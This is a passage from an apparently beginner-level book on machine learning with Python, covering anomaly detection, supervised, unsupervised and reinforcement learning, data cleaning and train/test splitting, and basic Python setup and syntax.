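One common way to sketch anomaly detection in Python is scikit-learn's IsolationForest, one of several algorithms that could fill this role. The transaction amounts below are invented for illustration:

```python
import numpy as np
from sklearn.ensemble import IsolationForest

# Hypothetical transaction amounts: mostly ordinary, plus one unusual point.
rng = np.random.default_rng(0)
normal = rng.normal(loc=50, scale=5, size=(100, 1))   # typical purchases
transactions = np.vstack([normal, [[500.0]]])          # one suspicious outlier

# Isolation Forest labels unusual data points with -1 and ordinary ones with 1.
detector = IsolationForest(contamination=0.01, random_state=0)
detector.fit(transactions)

print(detector.predict([[500.0]])[0])   # the outlier is flagged as -1
```

In a deployed system, a -1 prediction would be what triggers the alarm described above.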
Supervised Vs. Unsupervised ML Techniques
Data specialists employ an array of machine algorithms in their discovery
operations. Below are some insights on the classification of supervised and
unsupervised learning techniques, which will help you to judge when to use
either of the techniques.
Data usage: Supervised learning employs training data to study the link
between the input and output. Unsupervised learning does not use output
data.
Accuracy of the outcome: Supervised learning is highly accurate and
reliable. Unsupervised learning is less accurate and therefore less
trustworthy.
Input data: In supervised learning, labeled data is used in training the
algorithms. In unsupervised learning, algorithms are run against unlabeled
data.
Number of classes: Known in supervised learning; unknown in unsupervised
learning.
Major drawback: Supervised learning struggles with the classification of big
data. Unsupervised learning fails to give precise information concerning
output and data sorting, because it works with unlabeled and unknown data.
Real time learning: Supervised learning takes place offline, while
unsupervised learning can happen in real time.
Process: In supervised learning, both input and output variables are given.
In unsupervised learning, only the input data is given.
Computational complexity: Supervised learning is relatively simple;
unsupervised learning is complex in terms of computation.
Deciding to employ a supervised or unsupervised machine learning algorithm
classically depends on your data volume and structure. Essentially, a well-
formed data science plan will employ both algorithm types to come up with
predictive data models. These models are more advanced and help the
stakeholders with decision-making across a variety of business functions.

3. Reinforcement Learning
This is a learning technique that trains machine learning models to make a
sequence of decisions. The agent is trained to attain its objective in an
uncertain, potentially complex environment. In this technique, an artificial
intelligence faces a game-like situation, and the computer tries to solve the
problem using trial and error. For the programmer to get the machine to do
what they want, the artificial intelligence gets penalized or rewarded for the
actions it performs. The idea is to maximize the total reward.
Usually there is a reward policy in the form of game rules, but the designer
does not give any hints on how the model should solve the puzzle. The model
starts from completely random trials and advances to sophisticated
approaches and even superhuman skill. In the process, this technique
leverages the full power of search, making it one of the most effective ways
to elicit a machine's creativity. As opposed to humans, an artificial
intelligence can employ a reinforcement algorithm to collect experience from
thousands of parallel gameplays, as long as it runs on an adequately
powerful computer infrastructure.
Let us look at a practical example that will perfectly illustrate the
reinforcement learning technique. However, before then we need to
understand some terms that we will use in the illustration.
Agent: This is an implicit entity that seeks to gain a reward by
performing actions in an environment.
Environment (e): A situation that an agent must face.
Reward (R): An instant response given to an agent on performing a
specific action.
State (s): The current scenario returned by the environment.
Policy (π): An approach employed by the agent to determine their next
action based on the prevailing state.
Value (V): The projected long-term return with discounting, as
opposed to the short-term reward.
Value Function: This stipulates the total reward, i.e., the value of
a state.
Model-based methods: Methods for solving reinforcement learning
problems that make use of a model of the environment.
Model of the environment: It imitates the behavior of the
environment, helping you draw conclusions regarding environment
behavior.
Action value / Q value (Q): This is not very different from value; the
only variation is that it takes an extra parameter, the current
action.
Illustration
Think of trying to teach your dog some new tricks. This dog does not
understand human language so you need to devise a strategy that will help
you achieve your goal. You will initiate a situation and observe the various
reactions by your dog. If the dog responds in the desired way, you give him
some beef. You will realize that every time you expose the dog to a similar
condition, they will tend to respond with greater enthusiasm hoping to get a
reward (the beef). It means that the positive experiences inspire the responses
your dog gives. As well, there are the negative experiences that teach the dog
what not to do because should they do it, then they will certainly miss their
share of beef.
In the given paradigm, your dog is an agent exposed to the environment. You
may, for instance, set up a situation requiring your sitting dog to walk when
you utter a particular word. The agent responds by performing an action
through which it transitions from one state to another, like moving from
sitting to walking. In this case, the policy is the process of choosing an action
given a state, with the expectation of a better result. After transitioning, the
agent may get a penalty or a reward in response.
Reinforcement Learning Algorithms
There are three techniques in implementation of a reinforcement learning
algorithm.
Value-based: Here, the agent anticipates a long-term return of the
prevailing states under the policy, and so you ought to maximize the
value function.
Policy-based: Under this RL scheme you endeavor to find a policy
such that the action executed in each state leads to the maximal reward
in the future.
Policy-based methods are further classified into deterministic, where the
policy produces the same action for any state, and stochastic, where every
action has a definite probability determined by the stochastic policy. The
stochastic policy is written π(a | s) = P[A_t = a | S_t = s].
Model-based: In this case you are expected to generate a virtual model
for every environment, where the agent learns how to perform in that
very environment.
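The value-based approach can be sketched with tabular Q-learning in plain Python. Everything below (the tiny corridor environment, its rewards, and the parameter values) is an illustrative assumption, not a standard benchmark:

```python
import random

# A tiny corridor environment: states 0..4, with a reward only for
# reaching the final state.
N_STATES = 5
ACTIONS = [0, 1]                       # 0 = step left, 1 = step right
alpha, gamma, epsilon = 0.5, 0.9, 0.1  # learning rate, discount, exploration

Q = {(s, a): 0.0 for s in range(N_STATES) for a in ACTIONS}
random.seed(42)

for _ in range(500):                   # episodes of trial and error
    s = 0
    while s != N_STATES - 1:
        if random.random() < epsilon:  # explore occasionally...
            a = random.choice(ACTIONS)
        else:                          # ...otherwise exploit what is known
            a = max(ACTIONS, key=lambda act: Q[(s, act)])
        s_next = max(0, s - 1) if a == 0 else s + 1
        r = 1.0 if s_next == N_STATES - 1 else 0.0  # reward at the goal only
        # Value-based update: nudge Q toward reward + discounted future value.
        best_next = max(Q[(s_next, b)] for b in ACTIONS)
        Q[(s, a)] += alpha * (r + gamma * best_next - Q[(s, a)])
        s = s_next

# After training, the agent prefers stepping right in every state.
print(all(Q[(s, 1)] > Q[(s, 0)] for s in range(N_STATES - 1)))
```

The penalty/reward signal and the epsilon-greedy policy here correspond directly to the agent, reward, and policy terms defined above.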

Types of Reinforcement Learning
Positive
This is an event triggered by specific behavior. It positively influences the
action taken by the agent. This happens through enhancing the frequency and
strength of the behavior. This method helps you to capitalize on performance
and sustain change for a longer period. Even so, you have to be careful as
over-reinforcement may cause state over-optimization and impinge on the
results.
Negative
It involves strengthening behavior prompted by a negative condition that
should have been dodged or stopped. Although it helps define a minimum
standard of performance, a drawback of this method is that it may provide
only enough reinforcement to meet that minimum behavior.
Applications of RL in Real Life
➢ Data processing and machine learning.
➢ Planning of business strategy.
➢ Robotics for industrial computerization.
➢ Aircraft and robot motion management.
➢ Helps in creation of customized training systems for students.
Summary
Data used in unsupervised learning is unlabeled and unknown,
and therefore you cannot get accurate information concerning
data sorting.
When moving from image to image you will have varied
information because the spectral properties of classes are also
likely to change over time.
Unsupervised machine learning locates all unknown types of
unidentified patterns in the data.
The user has to dedicate time to label and interpret the classes
which follow a particular classification.
The major downside of unsupervised learning is the failure to
get accurate information in regard to data sorting.
Reinforcement learning is a machine learning method with
three approaches: 1) value-based, 2) policy-based, and 3)
model-based.
The two types of reinforcement learning are 1) positive and 2)
negative.
RL should not be used for problem-solving when you have
adequate data.
The major RL method drawback is that learning speed may be
affected by parameters.
Learning the Data sets of Python
When it comes to working with machine learning and the Python language,
nothing matters more than the data. The more data that you are
able to gather and clean, the easier it is to work with some of the algorithms
that come with this process. You will find that Python is going to provide us
with many algorithms, but we first need to be able to organize the data and
get it set up to go through the algorithms for training and testing, in order to
see the results that we would like.
With this in mind, we need to take some time to explore the different types of
data that we are able to use. We have to look at some of the differences that
come up with unstructured and structured data when to use each one, and
how we can use these types of data in order to help us train and test some of
our Python machine learning algorithms.
Structured Data Sets
The first type of data that we need to spend time working with is structured
data. Traditionally, this was the only kind of data available; it was harder to
get but easy to work with. Companies would look for the structured data that
they needed, and then make the business decisions they needed to move
forward.
This kind of data is going to be any data that has been organized well and is
then going to fit into a formatted repository for us to use. Usually, this is
going to be data that is stored in a database so that the elements can be used
for more effective processing and analysis.
We may be able to find this kind of data when we are going through other
databases to help with the information, or when we get the results of a
survey. This one is much easier to work with because it is already organized,
and it is going to fit into the algorithm that you want to use without
you having to worry about missing values, duplicates, outliers, or anything
else like this. It is, however, a much more expensive kind of data to collect,
which can make it harder to rely on overall as well.
This is why many companies have to strike a balance over how much
structured data and how much unstructured data they want to work with. The
structured data can make the work easier and will ensure that the algorithm is
going to work better, but it is harder to collect, there is less of it, and it is
more expensive. The unstructured data is sometimes hard to work with and
takes time to clean and organize, but there are endless amounts of it, it can
still be used to handle your machine learning algorithms, and it is a lot less
expensive to gather up and use.
Unstructured Data Sets
The second type of data that we need to take a look at is the unstructured
data. This is basically going to represent any of the data that doesn’t provide
us with a recognizable structure to it. It is going to be raw and unorganized,
and there may not be any rhyme or reason to what you are seeing.
Unstructured data is often going to be called loosely structured data in some
cases, where the sources of data may have some kind of structure, but not all
of the data in that set will end up following the same structure, so you will
still have some work to handle to make them work for your needs.
For those businesses that are going to center around the customer, the data
that is found in this kind of form can be examined and there is so much that
we are able to get out of it, such as using it to enhance the relationship
marketing and the customer relationship management that happens as well.
The development of unstructured data, as time goes on, is likely to keep
growing because more and more businesses are looking to gather this
information, and it can be gathered and created in no time at all.
Unstructured data refers to any data that follows a form that is less ordered
than items like a database, table, spreadsheet, or other ordered set of data. In
fact, the contrast with the term data set is a good way to look at this, because
that term is associated with data that is neat and doesn't have any extra
content. With unstructured data, we are basically working with a lot of data
that is not necessarily organized and can be hard to work with without some
help organizing it.
There are a ton of instances where we are going to see this kind of data. We
may see it in documents, social media posts, medical records, books,
collaboration software, instant messages, presentations, and Word
documents, to name a few. We are also able to work with some non-textual
unstructured data, and this can include video files, JPEG images, and even
MP3 audio files as well.
Most of the data that you are going to work with over time will rely on the
idea of unstructured data. There is so much of this kind of data out there to
work with, and it is often easier to find and less expensive compared to some
of the structured data that we talked about above. Be prepared to handle
some of this unstructured data, and make sure that it is cleaned and ready to
go through your machine learning algorithms.
How to Manage the Missing Data
We also need to spend some time working with the missing data that comes
in. When we are gathering all of that data from all of those different sources,
it is likely that at least some of that data is going to come in missing. Whether
this is just one part of the data, or there are a lot of values that are missing for
entry, we need to know how we can manage these missing data points.
If we tried to push some of these missing data points through the chosen
algorithm, it would not end up going all that well. The algorithm may or may
not be able to handle some of the issues with the missing data and even if the
algorithm is able to handle the missing values, there could be issues with it
skewing the results. This is why it is important to choose which method you
would like to use when it is time to manage that missing data.
The method you choose will depend on the type and amount of missing data.
If you just have a few points that are missing, then it is probably fine to erase
those points and not worry about them at all. This can be the easiest method
to work with because you will be able to get them gone in no time. However,
for the most part, it is important to keep all of the data that you have, and
filling them in is a better way to manage the data.
There are a few ways that you are able to fill in the missing data. Usually,
going with the mean of the rest of the data is going to be a good way to start.
This ensures that you are still able to use the entry with the missing value,
while not losing out on some of the important parts that you need from that
entry as well. Find the standard value that you want to use, and then fill in
those missing parts so that the data can work better with the algorithm that
we are using.
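A short pandas sketch of both options follows; the small table of ages is invented, and which option to pick is the judgment call discussed above:

```python
import numpy as np
import pandas as pd

# A small data set with one missing value in the "age" column.
df = pd.DataFrame({"age": [25.0, 30.0, np.nan, 35.0],
                   "purchases": [3, 7, 2, 5]})

# Option 1: erase the rows with missing points entirely.
dropped = df.dropna()

# Option 2 (usually better): fill the gap with the mean of the rest of the data.
df["age"] = df["age"].fillna(df["age"].mean())
print(df["age"].tolist())   # → [25.0, 30.0, 30.0, 35.0]
```

With option 2 the entry keeps its other values (here, the purchase count), which is the main argument for filling rather than dropping.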
In addition to the missing data, we need to spend some time learning how to
manage the outliers and duplicate content. Both of these, if they are not taken
care of, are going to skew the results that you get. It is important to figure
out the best way to handle both of them before you move on.
To start, we have the outliers. If you have big outliers that are random but
really high or really low compared to the rest of the values, you will find that
it is going to mess with your results, and those results are not going to be as
accurate as you would like. If this is what happens with your data, then it is
probably best to just delete the outlier. It is just something that is not that
important, and removing it will ensure that you are able to handle the data in
an accurate manner.
Now, there are some situations where the outliers are going to be important,
as well. If you are looking at some of the outliers, and it looks like there are a
number of outliers that are going to fit into one cluster or group, then this
may be a sign that we need to move on to looking at these and using the
outliers. If you can see that a significant number of outliers are in this group,
rather than just one or two random outliers, then this could be a good sign
that there is a new option to work with for reaching customers, marketing, the
new product you want to release and more. It never hurts to take a look at
these outliers, but for many situations, you will want to delete these.
In addition, we need to focus on the duplicates. Many times we will want to
go through and delete the duplicates so that the answers don’t end up causing
any issues with the results that we have. If you have ten of the same person,
with all of the same information for them in your set of data, it is going to
skew your results.
If this happens a few times, the issue is going to get even worse overall. For
the most part, we want to go through and delete the duplicates so that we
end up with none of them, or at least a minimal number.
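A hypothetical pandas sketch of both clean-up steps follows; the customer records and the cutoff value are invented purely for illustration:

```python
import pandas as pd

# Invented data with one duplicated entry and one extreme outlier.
df = pd.DataFrame({"customer": ["ann", "bob", "bob", "cara", "dan"],
                   "spend":    [50,    55,    55,    60,     9000]})

# Remove exact duplicate rows so one person is not counted several times.
df = df.drop_duplicates()

# Delete the random high outlier; the cutoff here is an illustrative
# assumption for this toy data, not a fixed rule.
cleaned = df[df["spend"] < 1000]
print(cleaned["customer"].tolist())   # → ['ann', 'bob', 'cara']
```

Before deleting, it is worth checking whether the dropped points form their own cluster, since, as noted above, a group of outliers can itself be a finding.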
Splitting Your Data
One thing that we will need to work on when it comes to our data is figuring
out how to split it up. There is some work that we have to do in order to
handle some of the data that we need before we can go through and add them
to the algorithms that we want to use. For example, we need to go through a
process of training and testing our algorithms to make sure they will work the
way that we want. This means that we need to split up the data that we have
into the training data and the testing data.
These two sets are important to making sure our algorithms are going to work
properly. Having them set up and using these sets in the proper manner will
help us to get the best results when it comes to working in machine learning.
The rules are pretty simple with this, though, so you will be able to get started
without any problems along the way.
For example, we need to make sure that the data we are using is high quality
to start with. If you do not have enough data, or the data is not high in
quality, then your algorithm is going to be trained improperly, and will not
work the way that you want. Always be careful about the kind of data that
you are using in this process.
Next, we need to make sure that we are splitting up the data properly. We
should have a group for testing and a group for training. Your training set
should be much larger to ensure that you are properly training the data that
you have and that the algorithm will get a good dose of the examples that you
present and what you want it to do.
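The split described above might be sketched with scikit-learn's train_test_split; the 80/20 ratio below is one reasonable choice, with the larger share going to training:

```python
import numpy as np
from sklearn.model_selection import train_test_split

# Fifty placeholder examples with two features each, and dummy labels.
X = np.arange(100).reshape(50, 2)
y = np.arange(50) % 2

# Keep roughly 80 percent for training (the larger group) and 20 for testing.
X_train, X_test, y_train, y_test = train_test_split(
    X, y, train_size=0.8, random_state=42)
print(len(X_train), len(X_test))   # → 40 10
```

Shuffling before splitting (which train_test_split does by default) helps keep both groups representative of the whole data set.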
Training and Testing Your Data
As we go through some of the processes with working on our data and these
algorithms, we have to make sure that we are training and testing all of the
algorithms first. You can’t just write a few lines of code and then put in your
data, hoping to get a good prediction to pop out. You need to take the time to
train and test the data through that algorithm, to ensure that the accuracy is
there, and to make sure that the algorithm is going to be ready for you to
work with.
The first step to this is going to be the training of your data. You have to
make sure that you are spending a good deal of time training your data so that
it knows the right way to behave. Out of the splitting of the data that we did
before, you want to have about 75 to 85 percent of your data in the
training set. This ensures that you have enough data there that will help you
to really train the algorithm and gives it plenty of time to learn along the way
as well.
Then you can feed all of that training data through your algorithm and let it
have some time to form those connections and learn what it is supposed to
do. From there, you will then need to test the data that you are working with,
as well. This will be the rest of the data that you are working with. You can
feed this through the algorithm, and wait to see how much accuracy comes
back.
Keep in mind with this one that, most of the time, these algorithms are going
to be able to learn by experience. This means that while they may not have as
high accuracy as you would like in the beginning, they will get better. In fact,
you may have to go through and do the training and testing phases a few
times in order to increase the accuracy enough that you will use the algorithm
to make predictions.
You want to get the accuracy as high as possible. However, if you are
noticing that the accuracy tends to be lower, and is going below 50 percent,
or is not improving as you do some iterations of the training and testing
phases, then this is a bad sign. It shows us that you either are not using
enough data in your training for the algorithm to properly learn, or you are
using bad data that is confusing the algorithm.
This is why we do the training and testing phases. It helps us to catch some of
the problems that may happen with this data and will allow us time to make
the necessary changes to the data and algorithm before we rely on the future
of our company using badly trained algorithms. We can make the
adjustments and run the phases again until the accuracy goes up, and we
know that we can rely on that data again.
Working with data is going to be a very big part of the machine
learning projects that we want to handle. We need to learn how to
distinguish the different types of data, how to handle the missing data and the
outliers, and how to split up the data so that we are able to properly train and
test the algorithms that we want to use. When we are able to work with this,
we are going to see some great results through our machine learning, and we
will then be able to use these predictions and insights to help improve our
business.
Chapter 5 How Does Machine Learning Compare
to AI
One thing that we need to spend some time working on and understanding
before we move on is the difference between Artificial Intelligence and
Machine learning. Machine learning is going to do a lot of different tasks
when we look at the field of data science, and it also fits into the category of
artificial intelligence at the same time. But we have to understand that data
science is a pretty broad term, and there are going to be many concepts that
will fit into it. One of these concepts that fit under the umbrella of data
science is machine learning, but we will also see other terms that include big
data, data mining, and artificial intelligence. Data science is a newer field that
is growing more as people find more uses for computers and use these more
often.
Another thing that you can focus on when you bring out data science is the
field of statistics, and it is going to be put together often in machine learning.
You can keep the focus on classical statistics, even when you are at the
higher levels, so that the data set will always stay consistent throughout the
whole thing. Of course, the different methods that you use to make this
happen will depend on the type of data that is put into this and how complex
the information that you are using gets as well.
This brings up the question here about the differences that show up between
machine learning and artificial intelligence and why they are not the same
thing. There are a lot of similarities that come with these two options, but the
major differences are what sets them apart, and any programmer who wants
to work with machine learning has to understand some of the differences that
show up. Let’s take some time here to explore the different parts of artificial
intelligence and machine learning so we can see how these are the same and
how they are different.
What is artificial intelligence?
The first thing we are going to take a look at is artificial intelligence or AI.
This is a term that was first brought about by a computer scientist named
John McCarthy in the 1950s. AI was first described as a method that you
would use for manufactured devices to learn how to copy the capabilities of
humans in regard to mental tasks.
However, the term has changed a bit in modern times, but you will find that
the basic idea is the same. When you implement AI, you are enabling
machines, such as computers, to operate and think just like the human brain
can. This is a benefit that means that these AI devices are going to be more
efficient at completing some tasks than the human brain.
At first glance, this may seem like AI is the same as machine learning, but
they are not exactly the same. Some people who don’t understand how these
two terms work can think that they are the same, but the way that you use
them in programming is going to make a big difference.
How is machine learning different?
Now that we have an idea of what artificial intelligence is all about, it is time
to take a look at machine learning and how this is the same as artificial
intelligence, and how this is different. When we look at machine learning, we
are going to see that this is actually a bit newer than a few of the other
options that come with data science as it is only about 20 years old. Even
though it has been around for a few decades so far, it has been in the past few
years that our technology and the machines that we have are finally able to
catch up to this and machine learning is being used more.
Machine learning is unique because it is a part of data science that is able to
focus just on having the program learn from the input, as well as the data that
the user gives to it. This is useful because the algorithm will be able to take
that information and make some good predictions about the future. Let’s look
at an example of using a search engine. For this to work, you would just need
to put in a term to a search query, and then the search engine would be able to
look through the information that is there to see what matches up with that
and returns some results.
The first few times that you do these search queries, it is likely that the results
will have something of interest, but you may have to go down the page a bit
in order to find the information that you want. But as you keep doing this, the
computer will take that information and learn from it in order to provide you
with choices that are better in the future. The first times, you may click on
like the sixth result, but over time, you may click on the first or second result
because the computer has learned what you find valuable.
With traditional programming, this is not something that your computer can
do on its own. Each person is going to do searches differently, and there are
millions of pages to sort through. Plus, each person who is doing their
searches online will have their own preferences for what they want to show
up. Conventional programming is going to run into issues when you try to do
this kind of task because there are just too many variables. Machine learning
has the capabilities to make it happen though.
Of course, this is just one example of how you are able to use machine
learning. In fact, machine learning can help you do some of these complex
problems that you want the computer to solve. Sometimes, you can solve
these issues with the human brain, but you will often find that machine
learning is more efficient and faster than what the human brain can do.
Of course, it is possible to have someone manually go through and do this for
you as well, but you can imagine that this would take too much time and be
an enormous undertaking. There is too much information, they may have no
idea where to even get started when it comes to sorting through it, the
information can confuse them, and by the time they get through it all, too
much time has passed and the information, as well as the predictions that
come out of it, are no longer relevant to the company at all.
Machine learning changes the game because it can keep up. The algorithms
that you are able to use with it are able to handle all of the work while getting
the results back that you need, in almost real-time. This is one of the big
reasons that businesses find that it is one of the best options to go with to help
them make good and sound decisions, to help them predict the future, and it
is a welcome addition to their business model.
Chapter 6 Hands on with Python
Installing Python (Windows)
Part of getting started with Python is installing the Python on your Windows.
For the first step of the installation, you will need to download the installation
package for your preferred version from this link below:
https://www.python.org/downloads/
Visiting this link, you will be directed to a page. On that page, you will need
to choose between the two latest versions for Python 2 and 3: Python 3.8.1
and Python 2.7.17.
On the other hand, if you are looking for a specific release, you can
explore the page to find download links for earlier versions. Normally, you
would opt to download the latest version, which is Python 3.8.1 –which was
released on October 14, 2019 –or you download the latest version of Python
2, 2.7.17. However, the version you download should be determined by the kind of
project you want to do, along with compatibility and support for updates.
Once you’re finished with the download, you can proceed to installation by
clicking on the downloaded .exe file. A standard installation includes pip,
IDLE, and the essential documentation.
Installing Python (Mac)
If you’re using a Mac, you can download the installation package from this
link:
https://www.python.org/downloads/mac-osx/
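Once the installation has finished, a quick optional check (not part of the original installation steps) is to ask the interpreter itself which version is running:

```python
# Confirm which Python interpreter you are running before moving on.
import sys

print(sys.version)        # full version string, e.g. "3.8.1 (default, ...)"
print(sys.version_info)   # structured form: (major, minor, micro, ...)
```

If the version printed does not match the one you downloaded, an older installation may be taking precedence on your system path.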
The next step in your learning is getting further into the Python
programming language. Python is a flexible yet powerful language that can
be used in multiple ways. It can be used interactively, when code or a
statement is to be tried on a line-by-line basis or when you are exploring
its features. Python can also be used in script mode, most notably when you
want to interpret a whole file of statements or an application program.
Working with Python, however, requires careful attention, especially when
you are first engaging with it. This caution holds true for every
programming language. To work with Python interactively, you can use either
the Command Line window or the IDLE development environment.
Since you are a beginner, either to programming in general or to Python,
there are different ways you can engage and interact with the Python
programming language. The following are the basic options for quick
interaction with Python:
The Command Line Interaction
Interacting with the command line is the simplest way for a beginner to
work with Python. You can picture how Python functions by watching its
response to each completed command entered at the >>> prompt. The command
line may not be the most popular way to engage with Python, but over the
years it has proven to be the easiest way for beginners to explore how
Python works.
Launching Python using the Command Line
If you're using macOS, GNU/Linux, or another UNIX system, you should run
the Terminal tool to get to the command line. On the other hand, if you are
using Windows, you can get to the Python command line by right-clicking on
the Start menu and launching Windows PowerShell.
When you want Python to do something for you, you instruct it by entering
commands that it recognizes. Be careful: even a small change in a command
can change the output. Python will then translate these commands into
instructions that your computer or device can understand and execute.
Let's take a look at some examples to see how Python works. Note that you
can use the print command to print the greeting
"Heydays, Savants!"
1. First of all, open Python's command line.
2. Then, at the >>> prompt, type the following (don't leave a space
between print and the parenthesis): print("Heydays, Savants!")
3. Now, press Enter to tell Python that you're finished with the command.
Immediately, the command line window will display Heydays,
Savants! Python has responded exactly as it was instructed, in a written
form it can relate to. On the other hand, to see how it reacts when you ask
it to print the same string using the wrong form of the print command, type
and enter the following command at the Python prompt: Print("Heydays,
Savants!")
The result will be an error: NameError: name 'Print' is not defined
This is an example of what you get when you use invalid or incomplete
statements. Note that Python is a case-sensitive programming language, so
whenever you get an error message like this, it could be that you typed
print with a capital letter. There is also an alternative to the print
command: you can simply type your statement inside quotes at the prompt,
like this: "Primes, Savants!", and Python will echo it back. Note that a
statement here means the words you wish to display once the command is
given; the words that can fit in are not restricted to the example given
here, however.
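The interactive session just described can also be written down as a small script. This sketch shows the correct lowercase print working and the capitalized Print failing because the name is undefined; catching the error is only done here so the script can continue:

```python
# Lowercase print is the built-in function and works as expected.
print("Heydays, Savants!")

# Python is case-sensitive: a capitalized Print is an unknown name.
try:
    Print("Heydays, Savants!")   # wrong capitalization
except NameError as err:
    error_message = str(err)

print(error_message)   # name 'Print' is not defined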
How to leave the Python command line
To exit from Python, you can type either of these commands: quit() or
exit(). Alternatively, on Windows, hold Control-Z and then press Enter (on
macOS and Linux, press Control-D); Python should exit.
Your familiarity with Python programming should be growing now; there is
still plenty to learn, and patience will pay off.
IDLE: Python's Integrated Development Environment (IDE)
One of the most interesting parts of Python is the IDLE (Integrated
Development and Learning Environment) tool. Although this particular tool
is included in Python's installation package, you can also download more
sophisticated third-party IDEs. IDLE gives you access to a more effective
platform to write your code and work interactively with Python. To open
IDLE, you can go through the same folder where you found the command line
icon, or use the Start menu (as you learned in the command line section).
When you click on the IDLE icon, you will be directed to the Python Shell
window. This takes us to the section on interacting with the Python Shell
window.
Interacting with the Python Shell Window
When you're in the Python Shell window, you will see a dropdown menu and
a >>> prompt that resembles what you saw in the command line window (the
first form of interaction discussed). IDLE's particular advantage is its
editing support for past commands. Here, you can use IDLE's editing menu to
scroll back to your previous commands, to cut, copy, and paste past
statements and, in general, to make any kind of edit. Clearly, IDLE is a
step up from command line interaction.
In the dropdown menu of the Python Shell window are the following menu
items: File, Windows, Help, Shell, Options, Edit, and Debug. Each of these
menus has different functions. The Shell and Debug menus are used while
creating larger projects, as they provide helpful features for the process.
While the Shell menu lets you restart the shell or search the shell's log
for the most recent reset, the Debug menu has lots of useful items for
tracing the source file of an exception and highlighting the offending
line. With the Debugger option, you can open an interactive debugger window
that lets you step through and inspect the programs running in Python. The
Options menu of the window lets you edit and configure IDLE to suit your
own Python working preferences.
Moreover, through the Help menu, you have access to the Python help files
and documentation.
Using the File menu, you can create a new document, open a module, open an
old file, and save your session through the items automatically provided in
this menu. With the 'New File' option, you can create code files; all you
have to do is click on it. When you do, you will be taken to a new window
with a simple, standard text editor where you can type or edit your code.
You will notice that the file is called 'untitled'; don't panic, this is
just the initial name of the document, which will change when you save your
code. One notable difference is that the file window does not carry the
'Shell' and 'Debug' menus, so its menu bar changes slightly from the Shell
window's. In their place, two new menus are introduced, namely the Run and
the Format menus. Whenever you run the code you have written in the file
window, the output will be shown in the Shell window.
At the start of this section, you were told that Python can also be used in
script mode. How do you do this? The way you get results is quite different
here. When working in script mode, the output you get won't be automatic in
the way it is in interactive mode. You have to request it from within your
code: to get output in this mode, run the script and produce the output
through the print() function inside your code.
To conclude this section, you've been taken through the two essential modes
of the Python programming language: the interactive mode and the script
mode. Whatever the situation, know that the fundamental difference is that
in one mode results appear only on command, while in the other they are
automatic.
Chapter 7 What is Python, and How Do I Use it?
We have spent some time talking about the Python coding language and
some of the neat things that you can do with this. However, to complete this
book, we also need to get a good understanding of the Python language and
what it is all about. Different parts show up in the Python coding language,
but knowing some of the basics, as well as, learning some of the power that
comes with Python makes all of the difference on the success that you can get
when you combine this coding language with machine learning.
We have talked briefly about the Python coding language already, as well as
some of the reasons why it may be so beneficial when you want to work with
machine learning. Even though it is considered one of the easier coding
languages to learn how to work with, it has a lot of power and strength that
comes in behind it, which makes it the best option to use whether you are a
beginner or someone who has been coding for quite some time. And since the
Python language does have some of the power of the bigger and more
powerful coding languages, you will be able to do a lot of cool things with
machine learning.
There are going to be a few different parts that come into play when you start
to learn how to work with the Python code even with machine learning. You
can work with the comments, functions, statements, and more. Let’s take a
look at some of the basic parts that come with coding in Python so that we
can do some of these more complicated things together as we progress
through machine learning.
The Comments
The first aspect of the Python coding language that we need to explore is that
of comments. There is going to be some point when you are writing out a
code where you would like to take a break and explain to others and yourself
what took place in the code. This is going to ensure that anyone who sees the
code knows what is going on at one point to another. Working with a
comment is the way that you would showcase this in your project, and can
make it easier for others to know the name of that part, or why you are doing
one thing compared to another.
When you would like to add in some comments to the code, you are going to
have a unique character that goes in front of your chosen words. This unique
code is going to be there to help you tell the computer program that it should
skip reading those words and move on to the next part of the code instead.
The unique character that you are going to use for this one is the # sign in
front of the comments you are writing. When the compiler sees this, it is
going to know that you don’t want that part of the code to execute at all. It
will wait until the next line before it starts reading the code again. An
example of a comment that you may see in your code would include:
#this is a new comment. Please do not execute in the code.
After you have written out the comment that you want here, and you are done
with it, you are then able to hit the return button or enter so that you can write
more code that the compiler can execute. You can have the freedom to
comment as long or as short as you would like based on what you would need
in the code. And you can write in as many of these comments as you would
like. It is usually seen as a better option if you keep the comments down to
what you need. Otherwise, it makes the code start to look a little bit messy
overall. But you can technically add in as many of these comments to your
code as you would like.
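A short sketch may make the two placements of comments clearer; the greeting variable here is just an example name, not something from the original text:

```python
# this whole line is a comment, so Python skips it entirely
greeting = "Hello"   # a comment can also sit at the end of a line of code
print(greeting)      # only the code before the # sign is executed
```

Everything after the # sign on a line is ignored, so comments never change what the program does.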
The Statements
The next part of the code that we need to focus on is the statements. Any time
that you are starting with your new code, whether you are working with
Python or with some other coding language along the way, you must add
these statements inside of the code. This allows the compiler to know what
you would like to happen inside. A statement is going to be a unit of code
that you would like to send to your interpreter. From there, the interpreter is
going to look over the statement and execute it based on the command that
you added in.
Any time you decide to write out the code, you can choose how many
statements are needed to get the code to work for you. Sometimes, you need
to work with one statement in a block of code, and other times, you will want
to have more than one. As long as each statement is placed correctly within
the structure of your code, it is fine to make a statement as long as you
would like, and to include as many statements as you would like.
When you are ready to write your code and add in at least one statement to
your code, you would then need to send it over so that the interpreter can
handle it all. As long as the interpreter can understand the statements that you
are trying to write out, it is going to execute your command. The results of
that statement are going to show up on the screen. If you notice that you write
out your code and something doesn’t seem to show up in it the right way,
then you need to go back through the code and check whether they are
written the right way or not.
Now, this all may sound like a lot of information, but there is a way to
minimize the confusion and ensure that it can make more sense to you. Let’s
take a look at some examples of how this is all going to work for you.
x = 56
Name = "John Doe"
z = 10
print(x)
print(Name)
print(z)
When you send this over to the interpreter, the results that should show up on
the screen are:
56
John Doe
10
It is as simple as that. Open up Python, and give it a try to see how easy it is
to get a few things to show up in your interpreter.
The Variables
The next things we consider inside our Python code are the variables. These
variables are important to learn about because they are the part that
stores your values in the right places so you can pull them up later on.
This means that if you do this process in the right way, the values are
going to be stored in the right spots of the computer's memory. The data in
the code helps determine which spots of memory these values are stored in,
and this makes it easier for you to find the information when it is time to
run the code.
The first thing that we need to focus on here is to make sure that the variable
has a value assigned to it. If there is a variable without a value, then the
variable won’t have anything to save and store. If the variable is given a good
value from the start, then it will behave the way you are expecting when you
execute the program.
When it comes to your Python code, there are going to be three types of
variables that you can choose from. They are all important and will have their
place to work. But you have to choose the right one based on the value that
you would like to attach to that variable. The main variables that are available
for you with Python are going to include:
1. Float: This is going to be a number that includes a decimal point,
such as 3.14.
2. String: This is going to be one of those statements that you would
write out, enclosed in quotation marks. You can add in any phrase that you
would like to this one.
3. Whole number (integer): This is going to be any of the other numbers
that you would want to use, ones that are not going to contain a decimal.
